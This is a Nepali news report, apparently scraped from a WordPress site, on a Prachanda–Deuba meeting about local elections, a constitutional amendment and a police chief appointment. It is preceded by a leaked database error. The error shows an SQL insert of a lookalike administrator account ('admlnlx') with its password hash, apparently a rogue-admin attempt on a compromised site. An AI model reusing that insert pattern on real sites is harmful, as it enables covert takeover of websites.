WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgyNRPxwoM6nZHFzHEf1pfr4dxs4.E0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:20:58', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २९–
प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ र प्रमुख सत्ता साझेदार नेपाली काँग्रेसका सभापति शेरबहादुर देउवाबीच स्थानीय निर्वाचन, संविधान संशोधनलगायत विषयमा आज साँझ प्रधानमन्त्री निवास बालुवाटारमा भेटवार्ता भएको छ ।
उहाँहरुबीच अन्य दलसँगको परामर्शमा निर्वाचनको मिति तय र संविधान संशोधनबारे कसरी सहमति जुटाउन सकिन्छ भन्नेबारेमा छलफल भएको प्रधानमन्त्रीका प्रेस सल्लाहकार गोविन्द आचार्यले जानकारी दिनुभयो ।
गृहमन्त्री विमलेन्द्र निधि, मुख्यसचिव र महान्यायाधिवक्तासमेत सहभागी छलफलमा नेपाल प्रहरीको नयाँ महानिरीक्षक नियुक्तिका विषयमा पनि कुराकानी भएको बुझिएको छ ।
सम्भवतः आइबार दिउँसो बस्ने मन्त्रिपरिषद्को बैठकमा ती विषयमा छलफल हुनेछ ।